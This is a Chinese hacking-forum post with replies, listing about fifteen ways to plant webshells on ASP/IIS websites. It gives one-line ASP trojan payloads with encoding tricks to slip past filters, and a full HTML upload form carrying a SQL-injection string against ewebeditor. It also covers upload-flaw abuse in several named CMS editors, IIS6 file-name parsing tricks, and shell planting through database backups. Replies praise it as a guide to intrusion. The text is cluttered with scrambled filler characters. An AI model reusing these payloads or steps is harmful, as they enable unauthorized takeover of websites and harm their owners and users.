返回列表 发帖

[原创文章] asp拿shell

1.有备份,上传图片备份。如不能修改文件后缀名,可备份成1.asp/1.mdb或1.asa/1.mdb的形式4 S( W- S: c6 U7 Y# l

$ ]2 f7 i5 ], f( x* g1 N  g  q: I2.写入配置文件一句话木马,如果过滤了<,%,>,(,)可尝试&#60;&#37;eval request&#40;&#34;value&#34;&#41;&#37;&#62;来突破,例如config.asp
0 W0 x  _& B+ l
' a) M; t5 W6 d. S/ y0 Y3.上传漏洞:
; _! M4 o! z+ l1 C( b' ~0 @- l
动网上传漏洞:抓包nc提交,其中路径可改为zjq.asp 的形式,空格替换成0x00" b- L* ?( N7 Z/ R+ g" b( n; m) L. T
/ U( a" ^& A$ @* Q$ _
逻辑上传漏洞:同时上传两个文件,第一个为正常文件,第二个为iis可解析后缀文件
; k( b- n6 _! R- U7 [! _2 m' ~% B& v# i6 N( F, G1 f, _: O
雷池上传漏洞:http://localhost/leichinews/admin/uploadPic.asp?actionType=mod&picName=test.asp
8 W# \7 S0 y# [& O8 O# s$ c8 W8 x3 \然后在上传文件里面填要传的图片格式的ASP木马
& s% J" |( F. A+ B就可以在uppic目录下上传文件名为test.asp的文件uppic/test.asp
# W, U$ V3 L, `  W7 |# E  `6 F4.ewebeditor:有后台添加asa或aaspsp上传类型,前提要进入后台。没后台如2.16版本可利用如下代码上传
' U& m" p8 H+ O6 J2 n4 P; `' p3 q  y' |/ F1 D2 \
<html>$ R( W8 B& S3 q5 F# l/ N  M
<head>; z8 L/ i1 c5 @
<title>ewebeditor upload.asp上传利用</title>& l+ c) a- [' {2 v" M
</head>
" X% V* A4 D; c1 y' `* u<body>
, J: J, f% t9 D: X<form action="upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard' and 'a'='a" method=post name=myform enctype="multipart/form-data">7 a# y9 U5 f8 `
<input type=file name=uploadfile size=100><br><br>
* |- E7 g7 e0 t+ e- E<input type=submit value=Fuck>
+ n; b! a! m$ j! v1 Y- |</form>* ~9 ?, _0 @& c7 ~: K% r
</body>2 A8 e3 C7 m$ ^  g; ~6 ?
</form>! ^. P, u  i- D" |9 W* S1 ^) f
</html>
' b# x& b; ~  }/ ^% o
0 r1 x4 M. r9 q* u4 H4 C2.8般亦可以利用admin_uploadfile.asp?id=14&dir=..列目录,前提是此文件可访问,或cookie欺骗后可访问3 c0 Z5 X" _; b: F6 G3 N+ m. f
5.fckeditor:/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp
8 S  k* c1 Q4 X! B! Z
& _1 A4 w$ c! x4 \$ G利用windows2003解析。建立zjq.asp的文件夹
; |& b% J' B) F) k) L  n
& j9 n8 y9 b4 b' N8 G6.southidceditor:admin/SouthidcEditor/Admin_Style.asp?action=styleset&id=47。修改上传类型3 r7 i9 t+ b" p

! C3 _, n! k2 S  k7 r6 A/ f7.cuteeditor:类似ewebeditor
; W( S5 `; v( L' _" U: o
1 n+ p4 H% p. U! u. a7 Z8.htmleditor:同上. \) ^9 p5 s- a+ F5 J1 P2 O

' Y+ ]5 Z3 {* z* h+ H9.插数据库一句话。前提是知道数据库路径,为asp,asa等后缀,无防下载表,有防下载表可尝试插入以下语句突破
+ \, y- i! D5 V( R2 S; e$ I+ h; |/ W2 t
8 ]/ ]4 Z( U  {) {" G<%execute request("value")%><%'<% loop <%:%># w0 Y5 e6 Z& L3 S. h" {! }
8 t+ r& y8 N6 V. G# e: P% u
<%'<% loop <%:%><%execute request("value")%>
* f  v, e3 u. |" w  P- B
% P# h0 _6 n' H9 k" b0 ]- C# r! v: g- u<%execute request("value")'<% loop <%:%>
6 T9 y. Z' J& N9.查看cookie,看上传路径是否为cookie记录,可修改为*.asp的形式,利用2003解析漏洞8 f* [) s& E& u; j* x# ^; S# M; v

2 }4 M9 l5 M" U1 C# W10.上传不重命名文件,可上传zjq.asp;zjq.jpg的文件,iis6.0解析漏洞
. ~" T1 k' b  b/ Q7 X; q8 B/ n" I6 ^& a
11.注册用户名为zjq.asp,前提是网站会根据用户名新建一个以用户名命名的文件夹,上传正常图片木马,利用2k34 l3 t8 {# @2 V1 K

. }7 J0 y8 c9 Z; s/ w解析漏洞得到webshell1 U$ s* ]- }6 V' V  h

* K5 a2 T' M* j/ M1 }0 o, w12.mssql差异备份,日志备份,前提需知道web路径5 S6 T3 u" P3 t6 }2 @* @$ I
7 K3 R3 ~9 G. D
13.先备份数据库(拿到shell便于恢复网站访问),上传图片shell,数据库为asp,asa等后缀,恢复数据库填写图片路径,速度要快,因为恢复完网站就不能正常访问,一句话连接得webshell
$ \* H/ m& F8 \5 s# ]# _/ X1 [. B9 s( E. x8 z8 M
14.添加上传类型php,并上传phpshell,前提服务器能解析php,例如dvbbs8.2后台拿shell
* r" h$ L0 g1 H' U
1 m9 O1 F) a0 o( m( ]( ~15.有些系统用的是防注入程序,数据库默认为sqlin.asp,我们可以www.xx.com/*.asp?id=1'<script language=VBScript runat=server>execute(request("zjq"))</Script>,这样就会在sqlin.asp中写入一句话shell,连接即可! ?- Z7 f3 r3 \! z* Z5 [6 I8 e& |

, v! V. }% {9 U2 t1 b# }* k& x; l( F5 X以上只是本人的一些拙见,并不完善,以后想到了再继续添加* m- i* L/ z3 Y2 |6 Y( `
不是我原创。我的朋友,飞鸟游鱼原创的
2

评分人数

  • 1335csy

  • 超超

好东西能分享 谢谢!!!

TOP

kankankankan
1

TOP

写的很不错

TOP

1# yyw258520
8 H( n3 r' f; F3 k6 D' a( @9 q9 h6 D% G% S8 ^9 J- Y/ I
* D0 [1 ?3 Y  p
很好啊、基本的入侵方法都包含了, K* |0 \1 V; ^) v6 I2 t

! Y+ w* l; X. i6 f9 M! z2 e最好来个提权的帖子再。
" m) D3 z8 o8 j$ z: @5 u: L- S# o7 x4 o* Q: P: X. R+ m6 ?9 L
不要网上百度的。

TOP

提权才是王道。

TOP

不错哦 呵呵 学习了

TOP

谢谢楼主分享技术。。。

TOP

返回列表